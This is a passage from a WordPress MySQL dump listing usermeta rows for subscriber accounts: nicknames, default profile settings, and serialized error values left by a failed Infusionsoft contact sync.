(38038, 2917, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38039, 2917, 'cyb_user_level', '0'),
(38040, 2917, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38041, 2917, 'default_password_nag', '1'),
(38042, 2918, 'nickname', 'rick.falkvinge1995'),
(38043, 2918, 'first_name', ''),
(38044, 2918, 'last_name', ''),
(38045, 2918, 'description', ''),
(38046, 2918, 'rich_editing', 'true'),
(38047, 2918, 'comment_shortcuts', 'false'),
(38048, 2918, 'admin_color', 'fresh'),
(38049, 2918, 'use_ssl', '0'),
(38050, 2918, 'show_admin_bar_front', 'true'),
(38051, 2918, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38052, 2918, 'cyb_user_level', '0'),
(38053, 2918, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38054, 2918, 'default_password_nag', '1'),
(38055, 2919, 'nickname', 'espanad1968'),
(38056, 2919, 'first_name', ''),
(38057, 2919, 'last_name', ''),
(38058, 2919, 'description', ''),
(38059, 2919, 'rich_editing', 'true'),
(38060, 2919, 'comment_shortcuts', 'false'),
(38061, 2919, 'admin_color', 'fresh'),
(38062, 2919, 'use_ssl', '0'),
(38063, 2919, 'show_admin_bar_front', 'true'),
(38064, 2919, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38065, 2919, 'cyb_user_level', '0'),
(38066, 2919, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38067, 2919, 'default_password_nag', '1'),
(38068, 2920, 'nickname', 'josh.erd1950'),
(38069, 2920, 'first_name', ''),
(38070, 2920, 'last_name', ''),
(38071, 2920, 'description', ''),
(38072, 2920, 'rich_editing', 'true'),
(38073, 2920, 'comment_shortcuts', 'false'),
(38074, 2920, 'admin_color', 'fresh'),
(38075, 2920, 'use_ssl', '0'),
(38076, 2920, 'show_admin_bar_front', 'true'),
(38077, 2920, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38078, 2920, 'cyb_user_level', '0'),
(38079, 2920, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38080, 2920, 'default_password_nag', '1'),
(38081, 2921, 'nickname', 'thevel1954'),
(38082, 2921, 'first_name', ''),
(38083, 2921, 'last_name', ''),
(38084, 2921, 'description', ''),
(38085, 2921, 'rich_editing', 'true'),
(38086, 2921, 'comment_shortcuts', 'false'),
(38087, 2921, 'admin_color', 'fresh'),
(38088, 2921, 'use_ssl', '0'),
(38089, 2921, 'show_admin_bar_front', 'true'),
(38090, 2921, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38091, 2921, 'cyb_user_level', '0'),
(38092, 2921, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38093, 2921, 'default_password_nag', '1'),
(38094, 2922, 'nickname', 'karmon_20011972'),
(38095, 2922, 'first_name', ''),
(38096, 2922, 'last_name', ''),
(38097, 2922, 'description', ''),
(38098, 2922, 'rich_editing', 'true'),
(38099, 2922, 'comment_shortcuts', 'false'),
(38100, 2922, 'admin_color', 'fresh'),
(38101, 2922, 'use_ssl', '0'),
(38102, 2922, 'show_admin_bar_front', 'true'),
(38103, 2922, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38104, 2922, 'cyb_user_level', '0'),
(38105, 2922, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38106, 2922, 'default_password_nag', '1'),
(38107, 2923, 'nickname', 'katierichfarm2010'),
(38108, 2923, 'first_name', ''),
(38109, 2923, 'last_name', ''),
(38110, 2923, 'description', ''),
(38111, 2923, 'rich_editing', 'true'),
(38112, 2923, 'comment_shortcuts', 'false'),
(38113, 2923, 'admin_color', 'fresh'),
(38114, 2923, 'use_ssl', '0'),
(38115, 2923, 'show_admin_bar_front', 'true'),
(38116, 2923, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38117, 2923, 'cyb_user_level', '0'),
(38118, 2923, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38119, 2923, 'default_password_nag', '1'),
(38140, 2925, 'use_ssl', '0'),
(38141, 2925, 'show_admin_bar_front', 'true'),
(38142, 2925, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38143, 2925, 'cyb_user_level', '0'),
(38144, 2925, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38145, 2925, 'default_password_nag', '1'),
(38146, 2926, 'nickname', 'sheilafount91871958'),
(38147, 2926, 'first_name', ''),
(38148, 2926, 'last_name', ''),
(38149, 2926, 'description', ''),
(38150, 2926, 'rich_editing', 'true'),
(38151, 2926, 'comment_shortcuts', 'false'),
(38152, 2926, 'admin_color', 'fresh'),
(38153, 2926, 'use_ssl', '0'),
(38154, 2926, 'show_admin_bar_front', 'true'),
(38155, 2926, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38156, 2926, 'cyb_user_level', '0'),
(38157, 2926, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38158, 2926, 'default_password_nag', '1'),
(38159, 2927, 'nickname', 'peggyconnors41980'),
(38160, 2927, 'first_name', ''),
(38161, 2927, 'last_name', ''),
(38162, 2927, 'description', ''),
(38163, 2927, 'rich_editing', 'true'),
(38164, 2927, 'comment_shortcuts', 'false'),
(38165, 2927, 'admin_color', 'fresh'),
(38166, 2927, 'use_ssl', '0'),
(38167, 2927, 'show_admin_bar_front', 'true'),
(38168, 2927, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38169, 2927, 'cyb_user_level', '0'),
(38170, 2927, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38171, 2927, 'default_password_nag', '1'),
(38172, 2928, 'nickname', 'chandler1984'),
(38173, 2928, 'first_name', ''),
(38174, 2928, 'last_name', ''),
(38175, 2928, 'description', ''),
(38176, 2928, 'rich_editing', 'true'),
(38177, 2928, 'comment_shortcuts', 'false'),
(38178, 2928, 'admin_color', 'fresh'),
(38179, 2928, 'use_ssl', '0'),
(38180, 2928, 'show_admin_bar_front', 'true'),
(38181, 2928, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38182, 2928, 'cyb_user_level', '0'),
(38183, 2928, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38184, 2928, 'default_password_nag', '1'),
(38185, 2929, 'nickname', 'm_lopez3231965'),
(38186, 2929, 'first_name', ''),
(38187, 2929, 'last_name', ''),
(38188, 2929, 'description', ''),
(38189, 2929, 'rich_editing', 'true'),
(38190, 2929, 'comment_shortcuts', 'false'),
(38191, 2929, 'admin_color', 'fresh'),
(38192, 2929, 'use_ssl', '0'),
(38193, 2929, 'show_admin_bar_front', 'true'),
(38194, 2929, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38195, 2929, 'cyb_user_level', '0'),
(38196, 2929, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38197, 2929, 'default_password_nag', '1'),
(38198, 2930, 'nickname', 'sorineanderson2001'),
(38199, 2930, 'first_name', ''),
(38200, 2930, 'last_name', ''),
(38201, 2930, 'description', ''),
(38202, 2930, 'rich_editing', 'true'),
(38203, 2930, 'comment_shortcuts', 'false'),
(38204, 2930, 'admin_color', 'fresh'),
(38205, 2930, 'use_ssl', '0'),
(38206, 2930, 'show_admin_bar_front', 'true'),
(38207, 2930, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38208, 2930, 'cyb_user_level', '0'),
(38209, 2930, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38210, 2930, 'default_password_nag', '1'),
(38211, 2931, 'nickname', 'robingridelli1968'),
(38212, 2931, 'first_name', ''),
(38213, 2931, 'last_name', ''),
(38214, 2931, 'description', ''),
(38215, 2931, 'rich_editing', 'true'),
(38216, 2931, 'comment_shortcuts', 'false'),
(38217, 2931, 'admin_color', 'fresh'),
(38218, 2931, 'use_ssl', '0'),
(38219, 2931, 'show_admin_bar_front', 'true'),
(38220, 2931, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38221, 2931, 'cyb_user_level', '0'),
(38222, 2931, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38223, 2931, 'default_password_nag', '1'),
(38224, 2932, 'nickname', 'abdellasm1954'),
(38225, 2932, 'first_name', ''),
(38226, 2932, 'last_name', ''),
(38227, 2932, 'description', ''),
(38228, 2932, 'rich_editing', 'true'),
(38229, 2932, 'comment_shortcuts', 'false'),
(38230, 2932, 'admin_color', 'fresh'),
(38231, 2932, 'use_ssl', '0'),
(38232, 2932, 'show_admin_bar_front', 'true'),
(38233, 2932, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38234, 2932, 'cyb_user_level', '0'),
(38235, 2932, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38236, 2932, 'default_password_nag', '1'),
(38237, 2933, 'nickname', 'awehki71972'),
(38238, 2933, 'first_name', ''),
(38239, 2933, 'last_name', ''),
(38240, 2933, 'description', ''),
(38241, 2933, 'rich_editing', 'true'),
(38242, 2933, 'comment_shortcuts', 'false'),
(38243, 2933, 'admin_color', 'fresh'),
(38244, 2933, 'use_ssl', '0'),
(38245, 2933, 'show_admin_bar_front', 'true'),
(38246, 2933, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38247, 2933, 'cyb_user_level', '0'),
(38248, 2933, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38249, 2933, 'default_password_nag', '1'),
(38250, 2934, 'nickname', 'cjenkins1581992'),
(38251, 2934, 'first_name', ''),
(38252, 2934, 'last_name', ''),
(38253, 2934, 'description', ''),
(38254, 2934, 'rich_editing', 'true'),
(38255, 2934, 'comment_shortcuts', 'false'),
(38256, 2934, 'admin_color', 'fresh'),
(38257, 2934, 'use_ssl', '0'),
(38258, 2934, 'show_admin_bar_front', 'true'),
(38259, 2934, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38260, 2934, 'cyb_user_level', '0'),
(38261, 2934, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38262, 2934, 'default_password_nag', '1'),
(38263, 2935, 'nickname', 'rpeiser1974'),
(38264, 2935, 'first_name', ''),
(38265, 2935, 'last_name', ''),
(38266, 2935, 'description', ''),
(38267, 2935, 'rich_editing', 'true'),
(38268, 2935, 'comment_shortcuts', 'false'),
(38269, 2935, 'admin_color', 'fresh'),
(38270, 2935, 'use_ssl', '0'),
(38271, 2935, 'show_admin_bar_front', 'true'),
(38272, 2935, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38273, 2935, 'cyb_user_level', '0'),
(38274, 2935, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38275, 2935, 'default_password_nag', '1'),
(38276, 2936, 'nickname', 'richard.harrison11963'),
(38277, 2936, 'first_name', ''),
(38278, 2936, 'last_name', ''),
(38279, 2936, 'description', ''),
(38280, 2936, 'rich_editing', 'true'),
(38281, 2936, 'comment_shortcuts', 'false'),
(38282, 2936, 'admin_color', 'fresh'),
(38283, 2936, 'use_ssl', '0'),
(38284, 2936, 'show_admin_bar_front', 'true'),
(38285, 2936, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38286, 2936, 'cyb_user_level', '0'),
(38287, 2936, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38288, 2936, 'default_password_nag', '1'),
(38289, 2937, 'nickname', 'rick.chen1971'),
(38290, 2937, 'first_name', ''),
(38291, 2937, 'last_name', ''),
(38292, 2937, 'description', ''),
(38293, 2937, 'rich_editing', 'true'),
(38294, 2937, 'comment_shortcuts', 'false'),
(38295, 2937, 'admin_color', 'fresh'),
(38296, 2937, 'use_ssl', '0'),
(38297, 2937, 'show_admin_bar_front', 'true'),
(38298, 2937, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38299, 2937, 'cyb_user_level', '0'),
(38300, 2937, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38301, 2937, 'default_password_nag', '1'),
(38302, 2938, 'nickname', 'daniellevannes20021967'),
(38303, 2938, 'first_name', ''),
(38304, 2938, 'last_name', ''),
(38305, 2938, 'description', ''),
(38306, 2938, 'rich_editing', 'true'),
(38307, 2938, 'comment_shortcuts', 'false'),
(38308, 2938, 'admin_color', 'fresh'),
(38309, 2938, 'use_ssl', '0'),
(38310, 2938, 'show_admin_bar_front', 'true'),
(38311, 2938, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38312, 2938, 'cyb_user_level', '0'),
(38313, 2938, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38314, 2938, 'default_password_nag', '1'),
(38315, 2939, 'nickname', 'custer1801981'),
(38316, 2939, 'first_name', ''),
(38317, 2939, 'last_name', ''),
(38318, 2939, 'description', ''),
(38319, 2939, 'rich_editing', 'true'),
(38320, 2939, 'comment_shortcuts', 'false'),
(38321, 2939, 'admin_color', 'fresh'),
(38322, 2939, 'use_ssl', '0'),
(38323, 2939, 'show_admin_bar_front', 'true'),
(38324, 2939, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38325, 2939, 'cyb_user_level', '0'),
(38326, 2939, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38327, 2939, 'default_password_nag', '1'),
(38328, 2940, 'nickname', 'vigneshgg1996'),
(38329, 2940, 'first_name', ''),
(38330, 2940, 'last_name', ''),
(38331, 2940, 'description', ''),
(38332, 2940, 'rich_editing', 'true'),
(38333, 2940, 'comment_shortcuts', 'false'),
(38334, 2940, 'admin_color', 'fresh'),
(38335, 2940, 'use_ssl', '0'),
(38336, 2940, 'show_admin_bar_front', 'true'),
(38337, 2940, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38338, 2940, 'cyb_user_level', '0'),
(38339, 2940, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38340, 2940, 'default_password_nag', '1'),
(38341, 2941, 'nickname', 'dwight61462003'),
(38342, 2941, 'first_name', ''),
(38343, 2941, 'last_name', ''),
(38344, 2941, 'description', ''),
(38345, 2941, 'rich_editing', 'true'),
(38346, 2941, 'comment_shortcuts', 'false'),
(38347, 2941, 'admin_color', 'fresh'),
(38348, 2941, 'use_ssl', '0'),
(38349, 2941, 'show_admin_bar_front', 'true'),
(38350, 2941, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38351, 2941, 'cyb_user_level', '0');
INSERT INTO `cyb_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES
(38352, 2941, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38353, 2941, 'default_password_nag', '1'),
(38354, 2942, 'nickname', 'mar310851976'),
(38355, 2942, 'first_name', ''),
(38356, 2942, 'last_name', ''),
(38357, 2942, 'description', ''),
(38358, 2942, 'rich_editing', 'true'),
(38359, 2942, 'comment_shortcuts', 'false'),
(38360, 2942, 'admin_color', 'fresh'),
(38361, 2942, 'use_ssl', '0'),
(38362, 2942, 'show_admin_bar_front', 'true'),
(38363, 2942, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38364, 2942, 'cyb_user_level', '0'),
(38365, 2942, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38366, 2942, 'default_password_nag', '1'),
(38367, 2943, 'nickname', 'd.mclean501984'),
(38368, 2943, 'first_name', ''),
(38369, 2943, 'last_name', ''),
(38370, 2943, 'description', ''),
(38371, 2943, 'rich_editing', 'true'),
(38372, 2943, 'comment_shortcuts', 'false'),
(38373, 2943, 'admin_color', 'fresh'),
(38374, 2943, 'use_ssl', '0'),
(38375, 2943, 'show_admin_bar_front', 'true'),
(38376, 2943, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38377, 2943, 'cyb_user_level', '0'),
(38378, 2943, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38379, 2943, 'default_password_nag', '1'),
(38380, 2944, 'nickname', 'allenshirian2006'),
(38381, 2944, 'first_name', ''),
(38382, 2944, 'last_name', ''),
(38383, 2944, 'description', ''),
(38384, 2944, 'rich_editing', 'true'),
(38385, 2944, 'comment_shortcuts', 'false'),
(38386, 2944, 'admin_color', 'fresh'),
(38387, 2944, 'use_ssl', '0'),
(38388, 2944, 'show_admin_bar_front', 'true'),
(38389, 2944, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38390, 2944, 'cyb_user_level', '0'),
(38391, 2944, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38392, 2944, 'default_password_nag', '1'),
(38393, 2945, 'nickname', 'sim4evr1976'),
(38394, 2945, 'first_name', ''),
(38395, 2945, 'last_name', ''),
(38396, 2945, 'description', ''),
(38397, 2945, 'rich_editing', 'true'),
(38398, 2945, 'comment_shortcuts', 'false'),
(38399, 2945, 'admin_color', 'fresh'),
(38400, 2945, 'use_ssl', '0'),
(38401, 2945, 'show_admin_bar_front', 'true'),
(38402, 2945, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38403, 2945, 'cyb_user_level', '0'),
(38404, 2945, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38405, 2945, 'default_password_nag', '1'),
(38406, 2946, 'nickname', 'bonrenner1996'),
(38407, 2946, 'first_name', ''),
(38408, 2946, 'last_name', ''),
(38409, 2946, 'description', ''),
(38410, 2946, 'rich_editing', 'true'),
(38411, 2946, 'comment_shortcuts', 'false'),
(38412, 2946, 'admin_color', 'fresh'),
(38413, 2946, 'use_ssl', '0'),
(38414, 2946, 'show_admin_bar_front', 'true'),
(38415, 2946, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38416, 2946, 'cyb_user_level', '0'),
(38417, 2946, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38418, 2946, 'default_password_nag', '1'),
(38419, 2947, 'nickname', 'jill.l.post1986'),
(38420, 2947, 'first_name', ''),
(38421, 2947, 'last_name', ''),
(38422, 2947, 'description', ''),
(38423, 2947, 'rich_editing', 'true'),
(38424, 2947, 'comment_shortcuts', 'false'),
(38425, 2947, 'admin_color', 'fresh'),
(38426, 2947, 'use_ssl', '0'),
(38427, 2947, 'show_admin_bar_front', 'true'),
(38428, 2947, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38429, 2947, 'cyb_user_level', '0'),
(38430, 2947, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38431, 2947, 'default_password_nag', '1'),
(38432, 2948, 'nickname', 'frenchscience2006'),
(38433, 2948, 'first_name', ''),
(38434, 2948, 'last_name', ''),
(38435, 2948, 'description', ''),
(38436, 2948, 'rich_editing', 'true'),
(38437, 2948, 'comment_shortcuts', 'false'),
(38438, 2948, 'admin_color', 'fresh'),
(38439, 2948, 'use_ssl', '0'),
(38440, 2948, 'show_admin_bar_front', 'true'),
(38441, 2948, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38442, 2948, 'cyb_user_level', '0'),
(38443, 2948, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38444, 2948, 'default_password_nag', '1'),
(38445, 2949, 'nickname', 'specialmedic1985'),
(38446, 2949, 'first_name', ''),
(38447, 2949, 'last_name', ''),
(38448, 2949, 'description', ''),
(38449, 2949, 'rich_editing', 'true'),
(38450, 2949, 'comment_shortcuts', 'false'),
(38451, 2949, 'admin_color', 'fresh'),
(38452, 2949, 'use_ssl', '0'),
(38453, 2949, 'show_admin_bar_front', 'true'),
(38454, 2949, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38455, 2949, 'cyb_user_level', '0'),
(38456, 2949, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38457, 2949, 'default_password_nag', '1'),
(38458, 2950, 'nickname', 'stephanie.porter611963'),
(38459, 2950, 'first_name', ''),
(38460, 2950, 'last_name', ''),
(38461, 2950, 'description', ''),
(38462, 2950, 'rich_editing', 'true'),
(38463, 2950, 'comment_shortcuts', 'false'),
(38464, 2950, 'admin_color', 'fresh'),
(38465, 2950, 'use_ssl', '0'),
(38466, 2950, 'show_admin_bar_front', 'true'),
(38467, 2950, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38468, 2950, 'cyb_user_level', '0'),
(38469, 2950, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38470, 2950, 'default_password_nag', '1'),
(38471, 2951, 'nickname', 'mjtran1061951'),
(38472, 2951, 'first_name', ''),
(38473, 2951, 'last_name', ''),
(38474, 2951, 'description', ''),
(38475, 2951, 'rich_editing', 'true'),
(38476, 2951, 'comment_shortcuts', 'false'),
(38477, 2951, 'admin_color', 'fresh'),
(38478, 2951, 'use_ssl', '0'),
(38479, 2951, 'show_admin_bar_front', 'true'),
(38480, 2951, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38481, 2951, 'cyb_user_level', '0'),
(38482, 2951, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38483, 2951, 'default_password_nag', '1'),
(38484, 2952, 'nickname', 'scotty_d71959'),
(38485, 2952, 'first_name', ''),
(38486, 2952, 'last_name', ''),
(38487, 2952, 'description', ''),
(38488, 2952, 'rich_editing', 'true'),
(38489, 2952, 'comment_shortcuts', 'false'),
(38490, 2952, 'admin_color', 'fresh'),
(38491, 2952, 'use_ssl', '0'),
(38492, 2952, 'show_admin_bar_front', 'true'),
(38493, 2952, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38494, 2952, 'cyb_user_level', '0'),
(38495, 2952, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38496, 2952, 'default_password_nag', '1'),
(38497, 2953, 'nickname', 'sfmman20002007'),
(38498, 2953, 'first_name', ''),
(38499, 2953, 'last_name', ''),
(38500, 2953, 'description', ''),
(38501, 2953, 'rich_editing', 'true'),
(38502, 2953, 'comment_shortcuts', 'false'),
(38503, 2953, 'admin_color', 'fresh'),
(38504, 2953, 'use_ssl', '0'),
(38505, 2953, 'show_admin_bar_front', 'true'),
(38506, 2953, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38507, 2953, 'cyb_user_level', '0'),
(38508, 2953, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38509, 2953, 'default_password_nag', '1'),
(38510, 2954, 'nickname', 'bjhenson1967'),
(38511, 2954, 'first_name', ''),
(38512, 2954, 'last_name', ''),
(38513, 2954, 'description', ''),
(38514, 2954, 'rich_editing', 'true'),
(38515, 2954, 'comment_shortcuts', 'false'),
(38516, 2954, 'admin_color', 'fresh'),
(38517, 2954, 'use_ssl', '0'),
(38518, 2954, 'show_admin_bar_front', 'true'),
(38519, 2954, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38520, 2954, 'cyb_user_level', '0'),
(38521, 2954, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38522, 2954, 'default_password_nag', '1'),
(38523, 2955, 'nickname', 'tindley.otha1976'),
(38524, 2955, 'first_name', ''),
(38525, 2955, 'last_name', ''),
(38526, 2955, 'description', ''),
(38527, 2955, 'rich_editing', 'true'),
(38528, 2955, 'comment_shortcuts', 'false'),
(38529, 2955, 'admin_color', 'fresh'),
(38530, 2955, 'use_ssl', '0'),
(38531, 2955, 'show_admin_bar_front', 'true'),
(38532, 2955, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(38533, 2955, 'cyb_user_level', '0'),
(38534, 2955, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(38535, 2955, 'default_password_nag', '1'),
(38536, 2956, 'nickname', 'topcep1978'),
(38537, 2956, 'first_name', ''),
(38538, 2956, 'last_name', ''),
(38539, 2956, 'description', ''),
(38540, 2956, 'rich_editing', 'true'),
(38541, 2956, 'comment_shortcuts', 'false'),
(38542, 2956, 'admin_color', 'fresh'),
(38543, 2956, 'use_ssl', '0'),
(38544, 2956, 'show_admin_bar_front', 'true'),
(38545, 2956, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
